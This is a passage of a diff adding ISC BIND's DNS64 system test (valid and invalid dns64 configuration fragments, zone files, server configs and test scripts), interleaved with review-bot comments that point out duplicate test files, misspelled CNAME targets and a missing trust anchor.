+ dns64 0000:0000:0000:0000:0200:000f::/96 { }; /* bits [64..71] MBZ */
+};
diff --git a/bin/tests/system/dns64/conf/bad12.conf b/bin/tests/system/dns64/conf/bad12.conf
new file mode 100644
index 0000000..6ffe720
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad12.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 0000:0000:0000:0000:0400:000f::/96 { }; /* bits [64..71] MBZ */
+};
diff --git a/bin/tests/system/dns64/conf/bad13.conf b/bin/tests/system/dns64/conf/bad13.conf
new file mode 100644
index 0000000..dc6c064
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad13.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 0000:0000:0000:0000:0800:000f::/96 { }; /* bits [64..71] MBZ */
+};
diff --git a/bin/tests/system/dns64/conf/bad14.conf b/bin/tests/system/dns64/conf/bad14.conf
new file mode 100644
index 0000000..985101a
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad14.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 0000:0000:0000:0000:1000:000f::/96 { }; /* bits [64..71] MBZ */
+};
diff --git a/bin/tests/system/dns64/conf/bad15.conf b/bin/tests/system/dns64/conf/bad15.conf
new file mode 100644
index 0000000..0931a55
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad15.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 0000:0000:0000:0000:2000:000f::/96 { }; /* bits [64..71] MBZ */
+};
diff --git a/bin/tests/system/dns64/conf/bad16.conf b/bin/tests/system/dns64/conf/bad16.conf
new file mode 100644
index 0000000..3a8b962
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad16.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 0000:0000:0000:0000:4000:000f::/96 { }; /* bits [64..71] MBZ */
+};
diff --git a/bin/tests/system/dns64/conf/bad17.conf b/bin/tests/system/dns64/conf/bad17.conf
new file mode 100644
index 0000000..6c9079b
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad17.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 0000:0000:0000:0000:8000:000f::/96 { }; /* bits [64..71] MBZ */
+};
diff --git a/bin/tests/system/dns64/conf/bad18.conf b/bin/tests/system/dns64/conf/bad18.conf
new file mode 100644
index 0000000..566e177
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad18.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 ::/32 { suffix ::8000:0000:0000:0000; }; /* bits [64..71] MBZ */
+};
diff --git a/bin/tests/system/dns64/conf/bad19.conf b/bin/tests/system/dns64/conf/bad19.conf
new file mode 100644
index 0000000..8a9fb76
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad19.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 ::/32 { suffix ::0100:0000:0000:0000; }; /* bits [64..71] MBZ */
+};
diff --git a/bin/tests/system/dns64/conf/bad2.conf b/bin/tests/system/dns64/conf/bad2.conf
new file mode 100644
index 0000000..d275998
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad2.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 ::/96 { suffix ::1; };
+};
diff --git a/bin/tests/system/dns64/conf/bad3.conf b/bin/tests/system/dns64/conf/bad3.conf
new file mode 100644
index 0000000..24971b3
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad3.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 ::/96 { suffix 127.0.0.1; };
+};
diff --git a/bin/tests/system/dns64/conf/bad4.conf b/bin/tests/system/dns64/conf/bad4.conf
new file mode 100644
index 0000000..bc73ca5
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad4.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 ::/129 { };
+};
diff --git a/bin/tests/system/dns64/conf/bad5.conf b/bin/tests/system/dns64/conf/bad5.conf
new file mode 100644
index 0000000..bc73ca5
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad5.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 ::/129 { };
+};
diff --git a/bin/tests/system/dns64/conf/bad6.conf b/bin/tests/system/dns64/conf/bad6.conf
new file mode 100644
index 0000000..1d85ab9
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad6.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 :: { };
+};
diff --git a/bin/tests/system/dns64/conf/bad7.conf b/bin/tests/system/dns64/conf/bad7.conf
new file mode 100644
index 0000000..afbf437
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad7.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 FC36:EAFE:F993::/64 {
+ exclude { bogusacl; };
+ };
+};
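Review bot: bad5.conf repeats bad4.conf exactly: both carry blob id `bc73ca5` and the single statement `dns64 ::/129 { };`, so the second file adds nothing to the "is rejected" loop in tests.sh. If it was meant to cover a different invalid prefix, give it its own case and say which, for example `dns64 ::/95 { }; /* length not one of 32, 40, 48, 56, 64, 96 */` (the lengths ns2/named.conf.in uses); otherwise drop the file. bad2 to bad9 would also benefit from the kind of one-line reason comment that the `bits [64..71] MBZ` files have, so a reader can tell which check each file is expected to trip.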
diff --git a/bin/tests/system/dns64/conf/bad8.conf b/bin/tests/system/dns64/conf/bad8.conf
new file mode 100644
index 0000000..9aa423f
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad8.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 FC36:EAFE:F993::/64 {
+ clients { bogusacl; };
+ };
+};
diff --git a/bin/tests/system/dns64/conf/bad9.conf b/bin/tests/system/dns64/conf/bad9.conf
new file mode 100644
index 0000000..b74204c
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad9.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 FC36:EAFE:F993::/64 {
+ mapped { bogusacl; };
+ };
+};
diff --git a/bin/tests/system/dns64/conf/good1.conf b/bin/tests/system/dns64/conf/good1.conf
new file mode 100644
index 0000000..d84733e
--- /dev/null
+++ b/bin/tests/system/dns64/conf/good1.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl rfc1918 { 10/8; 192.168/16; 172.16/12; };
+options {
+ /* Well Known Prefix */
+ dns64 64:FF9B::/96 {
+ clients { any; };
+ mapped { !rfc1918; any; };
+ exclude { ::ffff:0:0/96; };
+ };
+};
diff --git a/bin/tests/system/dns64/conf/good2.conf b/bin/tests/system/dns64/conf/good2.conf
new file mode 100644
index 0000000..41b5730
--- /dev/null
+++ b/bin/tests/system/dns64/conf/good2.conf
@@ -0,0 +1,21 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl rfc1918 { 10/8; 192.168/16; 172.16/12; };
+options {
+ /* Well Known Prefix */
+ dns64 64:FF9B::/96 {
+ mapped { !rfc1918; any; };
+ exclude { ::ffff:0:0/96; };
+ };
+};
diff --git a/bin/tests/system/dns64/conf/good3.conf b/bin/tests/system/dns64/conf/good3.conf
new file mode 100644
index 0000000..450b2e0
--- /dev/null
+++ b/bin/tests/system/dns64/conf/good3.conf
@@ -0,0 +1,21 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl rfc1918 { 10/8; 192.168/16; 172.16/12; };
+options {
+ /* Well Known Prefix */
+ dns64 64:FF9B::/96 {
+ clients { any; };
+ exclude { ::ffff:0:0/96; };
+ };
+};
diff --git a/bin/tests/system/dns64/conf/good4.conf b/bin/tests/system/dns64/conf/good4.conf
new file mode 100644
index 0000000..2c57f23
--- /dev/null
+++ b/bin/tests/system/dns64/conf/good4.conf
@@ -0,0 +1,21 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl rfc1918 { 10/8; 192.168/16; 172.16/12; };
+options {
+ /* Well Known Prefix */
+ dns64 64:FF9B::/96 {
+ clients { any; };
+ mapped { !rfc1918; any; };
+ };
+};
diff --git a/bin/tests/system/dns64/conf/good5.conf b/bin/tests/system/dns64/conf/good5.conf
new file mode 100644
index 0000000..f6027a4
--- /dev/null
+++ b/bin/tests/system/dns64/conf/good5.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl rfc1918 { 10/8; 192.168/16; 172.16/12; };
+options {
+ /* Well Known Prefix */
+ dns64 64:FF9B::/96 { };
+};
diff --git a/bin/tests/system/dns64/ns1/example.db b/bin/tests/system/dns64/ns1/example.db
new file mode 100644
index 0000000..8253f1d
--- /dev/null
+++ b/bin/tests/system/dns64/ns1/example.db
@@ -0,0 +1,56 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA ns1 marka.isc.org. 0 0 0 0 1200
+@ NS ns1
+ns1 A 10.53.0.1
+excluded-good-a AAAA 2001:eeee::1
+ A 1.2.3.4
+excluded-bad-a AAAA 2001:eeee::2
+ A 10.0.0.1
+excluded-only AAAA 2001:eeee::3
+partially-excluded-good-a AAAA 2001:eeee::1
+ AAAA 2001::1
+ A 1.2.3.4
+partially-excluded-bad-a AAAA 2001:eeee::2
+ AAAA 2001::2
+ A 10.0.0.1
+partially-excluded-only AAAA 2001:eeee::3
+ AAAA 2001::3
+a-only A 1.2.3.5
+a-and-aaaa AAAA 2001::1
+ A 1.2.3.6
+aaaa-only AAAA 2001::2
+a-not-mapped A 10.0.0.2
+a-and-mapped AAAA ::ffff:1.2.3.4
+ A 1.2.3.5
+a-and-aaaa-and-mapped AAAA 2001:eeee::4
+a-and-aaaa-and-mapped AAAA ::ffff:1.2.3.4
+a-and-aaaa-and-mapped A 1.2.3.5
+mx-only MX 10 ns.example.
+cname-excluded-good-a CNAME excluded-good-a
+cname-excluded-bad-a CNAME excluded-bad-a
+cname-excluded-only CNAME excluded-only
+cname-partial-excluded-good-a CNAME partial-excluded-good-a
+cname-partial-excluded-bad-a CNAME partial-excluded-bad-a
+cname-partial-excluded-only CNAME partial-excluded-only
+cname-a-only CNAME a-only
+cname-a-and-aaaa CNAME a-and-aaaa
+cname-aaaa-only CNAME aaaa-only
+cname-a-not-mapped CNAME a-not-mapped
+cname-mx-only CNAME mx-only
+cname-non-existent CNAME non-existent
+ttl-less-than-600 500 A 5.6.7.8
+ttl-more-than-600 700 A 5.6.7.8
+ttl-less-than-minimum 1100 A 5.6.7.8
+ttl-more-than-minimum 1300 A 5.6.7.8
+rpz 1500 A 99.99.99.99
diff --git a/bin/tests/system/dns64/ns1/named.conf.in b/bin/tests/system/dns64/ns1/named.conf.in
new file mode 100644
index 0000000..a118525
--- /dev/null
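Review bot: The three `cname-partial-excluded-*` records in example.db point at `partial-excluded-good-a`, `partial-excluded-bad-a` and `partial-excluded-only`, but the owners defined earlier in the zone are spelled `partially-excluded-*`, so these CNAMEs lead to names that do not exist. A query through them would come back as NXDOMAIN behind a CNAME instead of exercising the partially-excluded data. The targets should read e.g. `cname-partial-excluded-good-a CNAME partially-excluded-good-a`, and likewise for `-bad-a` and `-only`. The part of tests.sh visible here does not query these names, so whether a later test depends on the current spelling is not something I can confirm.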
+++ b/bin/tests/system/dns64/ns1/named.conf.in
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS1
+
+acl rfc1918 { 10/8; 192.168/16; 172.16/12; };
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ allow-recursion { 10.53.0.1; };
+ notify yes;
+ dnssec-validation yes;
+
+ dns64 2001:bbbb::/96 {
+ clients { any; };
+ mapped { !rfc1918; any; };
+ exclude { 2001:eeee::/32; 64:FF9B::/96; ::ffff:0000:0000/96; };
+ suffix ::;
+ recursive-only yes;
+ };
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+};
+
+zone "signed" {
+ type primary;
+ file "signed.db.signed";
+};
+
+// include "trusted.conf";
diff --git a/bin/tests/system/dns64/ns1/root.db b/bin/tests/system/dns64/ns1/root.db
new file mode 100644
index 0000000..0e3bbee
--- /dev/null
+++ b/bin/tests/system/dns64/ns1/root.db
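Review bot: `dnssec-validation yes;` in ns1/named.conf.in is set with no trust anchor in the file: the only reference is the commented-out `// include "trusted.conf";` on the last line, and sign.sh in this commit does not write a trusted.conf. With `yes` rather than `auto`, named validates only against manually configured anchors, so answers from the `signed` zone are presumably handled as insecure; ns2/named.conf.in has the same setting and no anchor either. If that is the intent, replace the dead include with a comment such as `/* no trust anchor: DNS64 is tested against unvalidated answers */`; if validated answers are meant to be covered, the anchor file has to be generated and the include enabled.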
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA a.root-servers.nil. marka.isc.org. 0 0 0 0 0
+@ NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+example NS ns1.example.
+ns1.example. A 10.53.0.1
+signed NS ns1.example.
+ns1.signed. A 10.53.0.1
diff --git a/bin/tests/system/dns64/ns1/sign.sh b/bin/tests/system/dns64/ns1/sign.sh
new file mode 100644
index 0000000..9eff6e3
--- /dev/null
+++ b/bin/tests/system/dns64/ns1/sign.sh
@@ -0,0 +1,26 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+zone=signed
+infile=example.db
+zonefile=signed.db
+
+key1=$($KEYGEN -q -a $DEFAULT_ALGORITHM $zone)
+key2=$($KEYGEN -q -a $DEFAULT_ALGORITHM -fk $zone)
+
+cat $infile $key1.key $key2.key > $zonefile
+
+$SIGNER -P -g -o $zone $zonefile > /dev/null
diff --git a/bin/tests/system/dns64/ns2/named.conf.in b/bin/tests/system/dns64/ns2/named.conf.in
new file mode 100644
index 0000000..be92d1a
--- /dev/null
+++ b/bin/tests/system/dns64/ns2/named.conf.in
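Review bot: `ns1.signed. A 10.53.0.1` in root.db is not glue for anything: the `signed` delegation on the line above names `ns1.example.`, whose address record is already present further up. Either the delegation was meant to be `signed NS ns1.signed.`, or the extra A record can go. A one-line comment above the two delegations, such as `; example and signed are both served by ns1.example. (10.53.0.1)`, would make the choice explicit.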
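Review bot: The `-e` on the `#!/bin/sh -e` line of sign.sh is not in effect when the script is started the way setup.sh starts it, `cd ns1 && $SHELL sign.sh`, because the interpreter is named on the command line and the first line is then just a comment. Unless conf.sh enables it, a failed `$KEYGEN` leaves `key1` empty and the script carries on to `cat` and `$SIGNER`. Put `set -e` in the body, after the `. $SYSTEMTESTTOP/conf.sh` line, and quote the expansions: `cat "$infile" "$key1.key" "$key2.key" > "$zonefile"`.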
@@ -0,0 +1,71 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+acl rfc1918 { 10/8; 192.168/16; 172.16/12; };
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+ dnssec-validation yes;
+
+ dns64 2001:aaaa::/96 {
+ clients { 10.53.0.2; };
+ mapped { !rfc1918; any; };
+ exclude { 2001:eeee::/32; 64:FF9B::/96; ::ffff:0000:0000/96; };
+ suffix ::;
+ };
+
+ dns64 64:FF9B::/96 {
+ clients { 10.53.0.1; };
+ mapped { !192.228.79.201; !rfc1918; any; };
+ exclude { 64:FF9B::/96; ::ffff:0000:0000/96; };
+ suffix ::;
+ };
+
+ dns64 2001:bbbb::/96 {
+ clients { 10.53.0.4; };
+ mapped { !rfc1918; any; };
+ suffix ::;
+ };
+
+ dns64-server "dns64.example.net.";
+ dns64-contact "hostmaster.example.net.";
+ dns64 2001:32::/32 { clients { 10.53.0.6; }; };
+ dns64 2001:40::/40 { clients { 10.53.0.6; }; };
+ dns64 2001:48::/48 { clients { 10.53.0.6; }; };
+ dns64 2001:56::/56 { clients { 10.53.0.6; }; };
+ dns64 2001:64::/64 { clients { 10.53.0.6; }; };
+
+ dns64 2001:96::/96 { clients { 10.53.0.7; }; };
+
+ response-policy { zone "rpz"; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "rpz" {
+ type primary;
+ file "rpz.db";
+};
diff --git a/bin/tests/system/dns64/ns2/rpz.db b/bin/tests/system/dns64/ns2/rpz.db
new file mode 100644
index 0000000..014cbf0
--- /dev/null
+++ b/bin/tests/system/dns64/ns2/rpz.db
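Review bot: Nothing in ns2/named.conf.in says which test group each `dns64` block serves; the blocks are told apart only by the `clients` address (`10.53.0.2`, `10.53.0.1`, `10.53.0.4`, `10.53.0.6`, `10.53.0.7`), which has to be matched by hand against the `-b` argument in tests.sh. The `2001:bbbb::/96` block, for instance, omits `exclude`, which looks deliberate given the "default exclude acl" tests that query with `-b 10.53.0.4`; a comment like `/* no exclude: default exclude acl tests, -b 10.53.0.4 */` would record that. The `!192.228.79.201` entry in the `64:FF9B::/96` `mapped` list also needs a line saying what that address stands for.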
@@ -0,0 +1,23 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 86400 ; 1 day
+@ IN SOA rpz. noc.rpz. (
+ 1 ; serial
+ 86400 ; refresh (1 day)
+ 3600 ; retry (1 hour)
+ 2592000 ; expire (4 weeks 2 days)
+ 25200 ; minimum (7 hours)
+ )
+ NS @
+ IN A 10.53.0.2
+
+rpz.example IN A 10.10.10.10
diff --git a/bin/tests/system/dns64/setup.sh b/bin/tests/system/dns64/setup.sh
new file mode 100644
index 0000000..24bd47c
--- /dev/null
+++ b/bin/tests/system/dns64/setup.sh
@@ -0,0 +1,20 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+
+cd ns1 && $SHELL sign.sh
diff --git a/bin/tests/system/dns64/tests.sh b/bin/tests/system/dns64/tests.sh
new file mode 100644
index 0000000..230246a
--- /dev/null
+++ b/bin/tests/system/dns64/tests.sh
@@ -0,0 +1,1406 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +rm -f dig.out.* + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd -p ${PORT}" + +for conf in conf/good*.conf +do + echo_i "checking that $conf is accepted ($n)" + ret=0 + $CHECKCONF "$conf" || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +for conf in conf/bad*.conf +do + echo_i "checking that $conf is rejected ($n)" + ret=0 + $CHECKCONF "$conf" >/dev/null && ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +# Check the example. domain + +echo_i "checking non-excluded AAAA lookup works ($n)" +ret=0 +$DIG 